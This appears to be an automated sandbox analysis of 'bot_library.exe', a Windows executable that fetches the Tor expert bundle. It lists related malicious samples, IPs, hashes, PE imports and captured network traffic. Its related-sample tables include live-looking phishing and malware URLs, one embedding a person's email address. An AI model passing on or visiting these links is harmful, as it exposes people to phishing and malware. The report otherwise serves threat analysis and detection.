	sora.arm7.elf	Get hash	malicious	Mirai	Browse	89.190.159.70
	zgO87vAB5t.exe	Get hash	malicious	Quasar	Browse	45.138.16.215
	zte.arm7.elf	Get hash	malicious	Unknown	Browse	45.14.224.253
	7GfciIf7ys.exe	Get hash	malicious	Unknown	Browse	45.141.215.88
HVC-ASUS	firmware.i686.elf	Get hash	malicious	Unknown	Browse	172.110.27.211
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	172.110.27.211
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	198.178.127.211
	Mc.exe	Get hash	malicious	Unknown	Browse	23.227.203.181
	Update.js	Get hash	malicious	Unknown	Browse	37.1.210.101
	update (2).js	Get hash	malicious	Unknown	Browse	37.1.214.59
	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.111.141.202
	1724421365548437fbee2df8be5f9f2782d09a29d0da43bfe498c7b225b42a47c097d42c7a572.dat-decoded.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse	23.227.193.34
	1724421365189aeafd2717d6392b9b61cf6f7faceaa97144d0ec94d123f3eaf1d18a28b3fe641.dat-decoded.exe	Get hash	malicious	Remcos	Browse	23.227.193.34
	https://www.iel4u.com/FFFF.HTML	Get hash	malicious	WinSearchAbuse	Browse	209.133.218.2
HETZNER-ASDE	https://bit.ly/4dU5cz3#CIgedJLuqmncgJYdTfeyaCNmWsrQtR&4sWlQeNzELg&135070/182/fldptionns.home.php?sq=1726-248&lk=267585-14&page=362	Get hash	malicious	Phisher	Browse	5.9.29.164
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	5.75.214.132
	https://hacerciudad.org/oliver/machine/	Get hash	malicious	HTMLPhisher	Browse	144.76.30.82
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.214.132
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.214.132
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.214.132
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.214.132
	https://www.tiktok.com/////link/v2?aid=1988&lang=enpccf5n&scene=bio_url&target=google.com.tw.////amp/s/%E2%80%8BLearfield%E2%80%8B.%E2%80%8Ba%C2%ADte%C2%ADd%C2%ADs%C2%ADe%C2%ADn%C2%ADat%C2%ADe%E2%80%8B.o%C2%ADn%C2%ADe%E2%80%8B/3CbNpT	Get hash	malicious	Phisher	Browse	178.63.74.241
	INV_00983.xls	Get hash	malicious	Remcos	Browse	5.161.99.9
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	5.75.214.132

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	signed contract and order confirmation.exe	Get hash	malicious	AgentTesla	Browse	159.69.63.226
	https://ftp.hp.com/pub/softlib/software13/HPSA/HPSupportSolutionsFramework-13.0.1.131.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	http://www.nanpfund.com/	Get hash	malicious	Unknown	Browse	159.69.63.226
	https://profile.datasbase.click/administration.html?now=Angela.Tremblay@CSC-SCC.GC.CA	Get hash	malicious	Unknown	Browse	159.69.63.226
	Confirmare de plat#U0103_shrunk.exe	Get hash	malicious	AgentTesla	Browse	159.69.63.226
	#U00d6deme Bildirimi_shrunk.exe	Get hash	malicious	AgentTesla	Browse	159.69.63.226
	Play_VM-Now(Bstilz)CLQD.html	Get hash	malicious	HTMLPhisher	Browse	159.69.63.226
	is homemade pepper spray legal uk 42639.js	Get hash	malicious	GookitLoader	Browse	159.69.63.226
	MV TBN CALL PORT FOR LOADING COAL_pdf.exe	Get hash	malicious	AgentTesla	Browse	159.69.63.226
	PAYMENT_CONFIRMATION-(Nicholas.winship)AWSK.html	Get hash	malicious	HTMLPhisher	Browse	159.69.63.226

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Tor\tor\pluggable_transports\conjure-client.exe	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	http://www.torproject.org	Get hash	malicious	Unknown	Browse
	tor-browser-windows-x86_64-portable-13.0.13.exe	Get hash	malicious	Unknown	Browse
C:\Tor\tor\pluggable_transports\lyrebird.exe	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Users\user\Desktop\bot_library.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8859465
Entropy (8bit):	4.016234131101484
Encrypted:	false
SSDEEP:	49152:Uw+Qhp5eFAT7lkUlX8SyUZAEsBSthyzu/KCLDqCEHO9mvEYB2jsMR4ASeQAmr5CH:x
MD5:	DE7AB474463600D17CD8867415D44F11
SHA1:	DE2B8FDD0925AEE447B27BC05247C2CC9E8765B9
SHA-256:	00BAD8441535ED58839712B923B60CD76B8BABE250B58EEFC417ADD2CC0A4AC8
SHA-512:	BB872150CCF0DB65E8AD67F5F69E05350854264D61CD22ADE544156F498483E1CB536857DF5102D2573321FB46665D3EC4294D3558E353511CCC69406FB8E01A
Malicious:	false
Reputation:	low
Preview:	# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool, which is available in the.# scripts/maint/geoip/geoip-db-tool directory in the Tor source.# code repository at https://gitlab.torproject.org/tpo/core/tor/ ..#.# For more information on the data, see https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Fri, 31 May 2024 04:41:46 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.16777216,16777471,AU.16777472,16778239,CN.16778240,16779263,AU.16779264,16781311,CN.16781312,16785407,JP.16785408,16793599,CN.16793600,16809983,JP.16809984,16842751,TH.16842752,16843007,CN.16843008,16843263,AU.16843264,16859135,CN.16859136,16875519,JP.16875520,16908287,TH.16908288,16909055,CN.16909056,16909311,AU.16909312,16941055,CN.169410

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.142613887206866
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bot_library.exe
File size:	5'029'376 bytes
MD5:	1f669ce249a053178531a1f2009f150b
SHA1:	0007d6a74135997b15b0d6327230b08a0488b06e
SHA256:	28cefc6fdac17623b223a16ead72f6afa6af60eae3600a9834aaa9349c9cf6b2
SHA512:	85c7f432d2d64a05ddcb5afae7dd5c70b66daba58746ce8c21a05ac8faa633b88714393c528c300b54608bf527986112cb78bb93f6c84dac4ebb0131c0b4f2df
SSDEEP:	49152:PNC2Rh3qQlUCM2z9aB2aB3CGO9dv1YqhfbfVGWMZtH+Wh6MQOoq0Vks4IOQFfZjJ:lN7fbNGWAHIMQQ+WnoIRf
TLSH:	6E361921BB8A99EDC06AC074834647726A7174CA0B35BAFF45C492753F69AF41F3C398
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@...I.l.L...P&..B...P&..C...P&..I...P&..W...@...Q...@...!....'..A...Rich@...........................PE..d......f...

Entrypoint:	0x1402e9e1c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66E084E6 [Tue Sep 10 17:41:58 2024 UTC]
TLS Callbacks:	0x402d2ba0, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	ce6b12d4b5a15d0c4fec3ee818cc8ad5

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x49a50c	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x49f000	0x24ea0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c4000	0x98a8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x41e430	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x41e500	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x41e2f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2fc000	0x6e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2fab1f	0x2fac00	7227bf39817bbac997eb407779ad61d8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2fc000	0x19fe88	0x1a0000	335368cc663d376b7f7c65326b0db1d7	False	0.292694091796875	data	5.200202258840914	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x49c000	0x2620	0x2400	9d2f799b4ee960e485da3c5fb2c0ff52	False	0.16710069444444445	data	2.35611443987113	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x49f000	0x24ea0	0x25000	5a3038e8287eb97246b938e433df8bdb	False	0.5002969277871622	data	6.377753031602325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4c4000	0x98a8	0x9a00	7e5ea132347d07c6f2d731a919f5d192	False	0.2794237012987013	data	5.45548997573704	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

DLL	Import
bcryptprimitives.dll	ProcessPrng
api-ms-win-core-synch-l1-2-0.dll	WaitOnAddress, WakeByAddressSingle, WakeByAddressAll
kernel32.dll	DuplicateHandle, HeapFree, HeapAlloc, GetProcessHeap, FormatMessageW, GetCurrentThreadId, SetFileTime, TerminateThread, WaitForSingleObject, CreateThread, AllocConsole, SetHandleInformation, ReleaseMutex, CreateMutexW, GetModuleFileNameW, GetSystemTimeAsFileTime, OpenThread, Thread32Next, Thread32First, CreateToolhelp32Snapshot, GetCurrentProcessId, GetLastError, LoadLibraryA, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, GetCurrentProcess, CreateIoCompletionPort, GetQueuedCompletionStatusEx, CreateProcessW, VirtualAlloc, LoadLibraryExA, ReadFile, GetOverlappedResult, PostQueuedCompletionStatus, VirtualFree, ExitProcess, SetFileCompletionNotificationModes, Sleep, GetModuleHandleA, GetProcAddress, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, AddVectoredExceptionHandler, SetThreadStackGuarantee, GetCurrentThread, SwitchToThread, QueryPerformanceCounter, GetSystemInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetLastError, GetCurrentDirectoryW, GetEnvironmentStringsW, GetEnvironmentVariableW, GetConsoleWindow, SetFileInformationByHandle, SetFilePointerEx, GetStdHandle, WriteFileEx, SleepEx, GetExitCodeProcess, QueryPerformanceFrequency, CloseHandle, HeapReAlloc, lstrlenW, FindClose, CreateFileW, GetFileInformationByHandle, GetFileInformationByHandleEx, CreateDirectoryW, FindFirstFileW, DeleteFileW, CreateSymbolicLinkW, CreateHardLinkW, SetFileAttributesW, GetFinalPathNameByHandleW, CopyFileExW, CreateEventW, CancelIo, GetConsoleMode, GetModuleHandleW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetSystemDirectoryW, GetWindowsDirectoryW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, GetFullPathNameW, WaitForSingleObjectEx, CreateMutexA
ws2_32.dll	ioctlsocket, connect, bind, WSASocketW, getsockname, getpeername, send, getsockopt, setsockopt, WSAIoctl, WSAGetLastError, socket, WSACleanup, shutdown, freeaddrinfo, WSASend, getaddrinfo, closesocket, recv, WSAStartup
user32.dll	ShowWindow
advapi32.dll	SystemFunction036, OpenProcessToken, GetTokenInformation, RegCloseKey, RegQueryValueExW, RegOpenKeyExW
ole32.dll	CoInitializeEx, CoUninitialize
shell32.dll	ShellExecuteExW
ntdll.dll	NtReadFile, NtDeviceIoControlFile, RtlNtStatusToDosError, NtCancelIoFileEx, NtSetInformationThread, NtWriteFile, NtCreateFile
secur32.dll	AcceptSecurityContext, EncryptMessage, ApplyControlToken, DecryptMessage, FreeContextBuffer, AcquireCredentialsHandleA, FreeCredentialsHandle, DeleteSecurityContext, QueryContextAttributesW, InitializeSecurityContextW
crypt32.dll	CertAddCertificateContextToStore, CertEnumCertificatesInStore, CertOpenStore, CertCloseStore, CertDuplicateCertificateChain, CertFreeCertificateChain, CertDuplicateStore, CertDuplicateCertificateContext, CertFreeCertificateContext, CertGetCertificateChain, CertVerifyCertificateChainPolicy
bcrypt.dll	BCryptGenRandom
oleaut32.dll	SysStringLen, SysFreeString
VCRUNTIME140.dll	_CxxThrowException, __current_exception_context, __current_exception, __C_specific_handler, memcmp, memmove, __CxxFrameHandler3, memcpy, memset
api-ms-win-crt-string-l1-1-0.dll	strlen
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr, pow
api-ms-win-crt-runtime-l1-1-0.dll	_register_thread_local_exe_atexit_callback, _set_app_type, __p___argc, terminate, _cexit, _seh_filter_exe, _c_exit, __p___argv, _exit, exit, _crt_atexit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_onexit_table, _register_onexit_function, _initialize_narrow_environment, _configure_narrow_argv
api-ms-win-crt-stdio-l1-1-0.dll	__p__commode, _set_fmode
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, free

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 12, 2024 19:58:15.128068924 CEST	1.1.1.1	192.168.11.20	0x8a1f	No error (0)	archive.torproject.org	archive-01.torproject.org		CNAME (Canonical name)	IN (0x0001)	false
Sep 12, 2024 19:58:15.128068924 CEST	1.1.1.1	192.168.11.20	0x8a1f	No error (0)	archive-01.torproject.org		159.69.63.226	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-09-12 17:58:15 UTC	145	OUT	GET /tor-package-archive/torbrowser/13.5.2/tor-expert-bundle-windows-x86_64-13.5.2.tar.gz HTTP/1.1 accept: / host: archive.torproject.org
2024-09-12 17:58:16 UTC	683	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 17:58:16 GMT Server: Apache X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Xss-Protection: 1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15768000; preload Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/13.5.2/tor-expert-bundle-windows-x86_64-13.5.2.tar.gz Last-Modified: Mon, 05 Aug 2024 15:41:59 GMT ETag: "15950cd-61ef184870637" Accept-Ranges: bytes Content-Length: 22630605 Cache-Control: max-age=2592000 Expires: Sat, 12 Oct 2024 17:58:16 GMT Connection: close Content-Type: application/x-gzip Content-Language: en
2024-09-12 17:58:16 UTC	7509	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 fd cb b2 a6 37 72 25 0a d6 78 3f 05 cd 6a d0 93 a8 d2 ff e1 0e cd 82 4c 8a 8c e4 55 0c 32 53 c9 59 4a 62 95 b2 4d 12 65 99 59 75 4e bd 7d 63 2d 5f 0b 40 5f ec f4 a8 06 6d bd c3 c2 f6 32 6c 07 1c 1f e0 00 1c 0e 87 e3 9f ff f8 d7 3f fe cd 7f fa df fb f3 5a 3f fd f5 e2 ef d7 ff fb ef c0 fd 95 73 2a 4f 03 7e 5e a5 b4 ff f4 49 fd df 5c 2f fe fc 8f bf fc f5 8f 7f fe e4 93 ff f4 e7 5f 7f fd eb ff 15 dd ff b7 bf ff ff e8 cf 3f a3 ff ff fb 2f bf fe e9 3f fe f7 f1 40 07 b7 ff cf fd bf 3a 3c f5 fa 3c ff 2f fd ff d4 a7 ff a7 4f 5e ff fb aa 74 7e fe ff bc ff ff f3 27 3f fe cb 9f fe f2 c9 7f fb d3 bf fe f2 c9 bf fc f1 2f 9f fc e3 2f bf fc fb 27 ff f4 eb bf ff cf 5f fe fc d7 5f fe f9 93 ff f6 e7 5f ff ed 93 bf fe cb 2f 9f 7c f8 fe ef fe Data Ascii: 7r%x?jLU2SYJbMeYuN}c-_@_m2l?Z?s*O~^I\/_?/?@:<</O^t~'?//'___/\|
2024-09-12 17:58:16 UTC	8000	IN	Data Raw: 51 66 7f 4e 2b f1 d0 33 c0 69 25 de 2e 21 28 75 73 e7 25 85 00 fd d9 94 31 10 6a 6c 9a 42 18 62 d3 44 30 4f 95 42 b3 22 38 55 e2 75 06 80 f1 0a e7 2b e1 a2 c4 70 94 0a ac 56 a2 b3 a5 29 1f f5 11 81 1a 64 e1 19 89 39 a5 4d b9 d4 b8 77 1b 98 32 4b 6c b8 bd da 94 c3 89 73 77 dc b0 2c ad ff fb 8b d6 ff e4 c4 dd 74 c3 ad 44 60 46 6b c6 78 b7 c1 2e b3 aa f2 b5 9c 2f aa c5 89 75 0b d8 a8 66 a4 e3 51 61 51 b6 3c 37 77 0b d8 68 a7 e3 46 73 95 9a 94 52 e2 66 ca f6 3a 94 ed 79 b7 c1 2e b3 99 fb 02 ae 12 14 fe 00 fd 34 48 93 30 44 88 03 31 ea 2f b5 a7 2e 68 08 ab f2 98 e7 5d e6 70 23 8f 23 f3 5a 4c 6b 78 a3 6d 4a 0d ae 31 ae a6 1b 6e 3a ab d9 81 c5 1d 3a 83 29 43 67 a8 71 35 c6 94 53 a3 18 bb 7e 53 ce 47 f5 e4 21 9d 28 79 48 47 90 ce 28 9e 49 f2 39 b7 0e 46 1c 8c 66 Data Ascii: QfN+3i%.!(us%1jlBbD0OB"8Uu+pV)d9Mw2Klsw,tD`Fkx./ufQaQ<7whFsRf:y.4H0D1/.h]p##ZLkxmJ1n::)Cgq5S~SG!(yHG(I9Ff
2024-09-12 17:58:16 UTC	8000	IN	Data Raw: f5 4c 6e 90 7c 55 c9 a3 83 2e 7f 2e 33 fb db db d5 4a cd ad d4 e6 e1 2e 5b 50 7f ce 51 26 70 71 e2 1e ef 4f b7 30 9c e0 51 fd 91 d9 67 81 6d ee 03 76 99 97 84 74 4b 48 2f a7 95 ba 25 a4 5f fd de db 4e ec 5b 96 3c 60 9f 71 c9 e7 70 95 ce 9c 0c dc 9c 68 d5 68 e1 24 ee e3 aa d2 70 95 c6 5e 3b fa 33 dc ef f3 12 9b e9 2f 9a db 7f 7e 61 67 3f 7e fe dd 6e 6f 9d 71 e1 5c a5 69 61 38 86 6b 60 33 da b7 c9 80 83 51 3a be 07 c0 4e dc 46 a7 9e b4 d3 ef e9 1a 32 c9 43 86 ae 74 ea 62 bb d2 ad 4d f9 b6 9c 2c ac 06 61 10 4b 53 6a 8b b1 36 e2 17 77 cb 67 82 96 6e ca e4 ec c7 f1 ac db f1 ac a7 e3 5a d3 ed 78 06 73 ef a9 a7 14 5d 80 2d 60 49 8a 6e 4f e5 e2 5e 76 f6 1d 6f 0d d8 d9 8f 28 a6 e2 ca 97 ab 95 8a 5b a9 94 8b b2 98 b2 6d 51 4c c5 4d 57 2f ca 6a ca 7a 16 14 c7 9a eb Data Ascii: Ln\|U..3J.[PQ&pqO0QgmvtKH/%_N[<`qphh$p^;3/~ag?~noq\ia8k`3Q:NF2CtbM,aKSj6wgnZxs]-`InO^vo([mQLMW/jz
2024-09-12 17:58:16 UTC	8000	IN	Data Raw: 14 b1 68 d8 c8 8a 45 83 3d 0d 2f 9b bf 47 17 cf b8 6c be a6 ac c4 f0 23 6b db 22 bc 28 57 ef 17 5d ff 14 5e 94 a9 52 f9 66 6f 06 06 25 8c 7d 71 3b 8f 18 66 5e 02 4c 02 1f 3f bc 09 37 24 86 96 0e 09 09 9c 22 31 c7 ad 37 e1 11 89 2d a2 50 0a 97 48 1c 11 16 3e f0 20 a3 88 3f 2f 4a c6 29 25 80 ca 81 56 0a 1c 8c a0 06 51 68 03 07 a3 67 c6 9d 50 e1 60 94 9e 88 cc 16 b8 05 23 c6 cd fe a0 44 9c 49 11 4c 69 41 81 a3 4c de 94 c7 28 0e 1c 65 f2 fe 26 26 2b e2 12 65 66 c5 8a 17 8e 32 79 7f 53 dc 79 7f 13 a0 e8 75 30 e1 60 c4 fb 9b df 7f fd 26 1c 8c b8 c1 f9 3e b2 73 83 43 80 01 0b 09 09 1c 8c 78 56 fe 75 54 9e 67 e5 04 38 00 fa 52 89 25 fa 1d e1 49 62 fa 5d b8 bd a2 8b 11 4a 84 a7 18 c2 51 26 1f 63 7d 1f ed c9 c7 58 09 fa e9 62 06 ca 03 a0 ee ad 56 0a dd 3b d5 88 27 Data Ascii: hE=/Gl#k"(W]^Rfo%}q;f^L?7$"17-PH> ?/J)%VQhgP`#DILiAL(e&&+ef2ySyu0`&>sCxVuTg8R%Ib]JQ&c}XbV;'
2024-09-12 17:58:16 UTC	8000	IN	Data Raw: e7 ba 76 29 27 cd ca 49 83 72 62 09 b1 72 d2 46 bd 18 f9 33 31 55 ee 32 35 5d f4 4b e5 e8 56 39 e8 c3 a3 2a c9 87 07 c0 3e f9 c4 a6 3c eb 7b f7 0c 86 d7 9b 3c b8 ba 95 93 7e 4d 56 dd 93 15 9d 5b cc 48 5a 7a 0e 3f 96 58 8f ba f5 90 7e cd 60 dd 52 87 19 d4 92 dc 3d 83 d1 65 c5 94 d6 a8 7b 71 74 32 e2 a1 44 6f c4 88 55 cf 76 e6 f9 de 34 36 7b 7b ed 21 d3 dd c5 fd 5a 61 bb 57 d8 de e3 51 78 61 53 9e 8e eb 5e 61 7b b7 31 07 58 7d d4 fb bc 28 a7 29 e7 a9 67 d7 28 ee d7 b2 db bd ec f6 f1 ec 95 ab 7b d9 e5 49 bd fa bd 7b 5a eb d7 62 da 2d 60 fd 92 a5 6e 59 3a 47 ed c4 a2 d4 63 d6 c2 2a 13 96 67 33 9a ee b8 79 26 7f 1d ca 77 a8 de fb 33 c7 4b 83 6b 20 e4 a3 c4 66 bc 34 b8 c6 b5 ec 0e 2f bb e3 79 ed d1 31 1e 75 c7 39 33 25 36 65 d9 1d 37 9e 62 ca d3 1d c3 e2 3d e0 Data Ascii: v)'IrbrF31U25]KV9><{<~MV[HZz?X~`R=e{qt2DoUv46{{!ZaWQxaS^a{1X}()g({I{Zb-`nY:Gcg3y&w3Kk f4/y1u93%6e7b=
2024-09-12 17:58:17 UTC	8000	IN	Data Raw: ca 74 dc 83 99 4e 9c 7c e0 a1 c4 6d fa 00 4e 4e ac 87 52 fd 9e 9e ed 4f bb b0 ba 83 9e cc df ee 44 97 b9 67 45 60 95 79 22 5f 4d 87 4d c0 4b ec bb 8f 92 87 0c fd 7e d5 4a f6 fb 9d e9 c4 b7 99 f6 fb c5 f3 ec 7b 14 27 29 cf 78 9e fd 7c a6 5c 02 f0 da af e7 3a 60 67 ef e7 33 b5 40 2f b0 15 09 60 25 9e 00 89 c0 c5 89 7d 57 a9 ba 3d 8f 5d 71 da 15 99 2f 20 ef ec ad ef c4 b9 ab a4 25 72 5e 87 c8 d3 87 c8 f3 3a 44 9e 3e 44 9e e9 44 ad 99 3e b1 9d 74 c7 8d 65 62 da 1d 77 f2 18 77 53 9a d1 89 ea 39 1d 4b 61 5e 9e b7 d3 9e b7 33 9f a7 79 a6 e3 1e cc 2b 9a c1 74 34 83 79 1d 8f 4e 1f 8f 4e 1e 8f aa 8f 7c 3c 3a af b8 d9 d3 81 0b 16 d8 31 5a 81 45 79 7c 5f a7 7d 5f 27 63 14 98 bb c7 66 3e 6e ed c0 a6 3c f3 7c f6 3c 7f 1d 7a 4e 1f 7a ce 2b 46 c1 f4 a1 e7 bc 42 64 4f 87 Data Ascii: tN\|mNNRODgE`y"_MMK~J{')x\|\:`g3@/`%}W=]q/ %r^:D>DD>tebwwS9Ka^3y+t4yNN\|<:1ZEy\|_}_'cf>n<\|<zNz+FBdO
2024-09-12 17:58:17 UTC	8000	IN	Data Raw: e7 91 3d b4 0b b8 d0 ce e4 8e ab a1 1e 2c 90 ed 8c 11 38 b2 17 6c 03 45 59 66 48 5d e5 25 ac e8 a3 5a 25 f3 95 ea 41 c8 67 0d f5 00 a0 cb 93 39 70 70 e7 c5 db 9f d8 1d 35 2e de 02 40 91 f8 a8 c4 1a 42 5b a9 33 28 7b e8 0c 0b f0 8e ad aa 14 77 6c 01 1c fd 29 b0 28 c7 e3 d9 a6 c6 9d fa 05 78 d1 49 94 71 d1 09 00 8a 84 18 85 22 d1 78 01 dd e3 bd c6 99 69 4b 8d e7 9b c1 bd 3d 1a 86 2d d9 6d 23 70 89 44 5e 68 fd 3c 12 35 36 5b 72 74 88 c0 ca 3e 1f cf 21 2d 69 c0 36 5e c9 57 f6 b8 92 bf 00 b5 0b 51 86 76 01 d0 f7 90 69 d2 2e 78 27 3e f6 1d c4 21 8a 8d 7e d4 31 09 b4 f0 a3 06 b0 eb 57 e0 e0 ce ab af 62 14 57 5f 01 b0 9b 88 89 ba c5 99 e9 02 2d ed 55 a6 c5 7d 58 00 3f 21 14 38 18 f1 a2 bd ca 8c 8b f6 0b f0 ea 6b 2c 67 2d ae be 42 03 cf 7b c8 f4 88 1b d3 f0 f4 b2 Data Ascii: =,8lEYfH]%Z%Ag9pp5.@B[3({wl)(xIq"xiK=-m#pD^h<56[rt>!-i6^WQvi.x'>!~1WbW_-U}X?!8k,g-B{
2024-09-12 17:58:17 UTC	8000	IN	Data Raw: 9b 9e f3 ed c3 4d f1 f8 87 2c 5f ff 7c 67 e2 33 6b 17 9d 0a 2d dc ca 74 b3 f1 10 74 dd 8b 5c be 17 b9 ca b9 7a b0 8a c7 90 eb 0e e3 f2 1d c6 85 98 e1 fe f6 e5 66 73 dc 71 97 6f 26 2e 3c c9 e4 7c ba c3 96 7d a5 be 7b 32 7b 7e bb 57 6b 65 5f a9 6f a7 be d3 f2 1c 34 53 bf 4e 57 97 4f 57 5f a2 e6 ca aa ca dd f1 25 72 51 1a b4 7f 9e 26 af a0 8b 99 47 a7 17 12 b5 a4 ab 7c d0 4d cc c7 6b ef a0 8b 99 39 5c f8 0a e4 aa e7 c0 62 f9 0a 64 10 39 2a d6 e2 7c 96 2b f5 ea d4 eb 99 7a 7c 0a bc 70 e0 ab 8a f3 81 ef 4b a4 7b 73 d0 fa cc 13 df 7b f9 16 61 10 de 02 07 ad d4 cf 8d e9 e5 73 d8 20 b2 de 6b 73 c9 b7 33 32 54 af 19 f0 ac b0 46 86 da 5c c8 fd 4a bd 3b 75 ec 7a 54 74 5e 48 5c e7 b0 cb e7 b0 ef 3e fc ac 2e ea 70 29 9d 08 87 2f ad 8e 50 af 85 44 f5 42 02 0f 92 a6 a4 Data Ascii: M,_\|g3k-tt\zfsqo&.<\|}{2{~Wke_o4SNWOW_%rQ&G\|Mk9\bd9*\|+z\|pK{s{as ks32TF\J;uzTt^H\>.p)/PDB
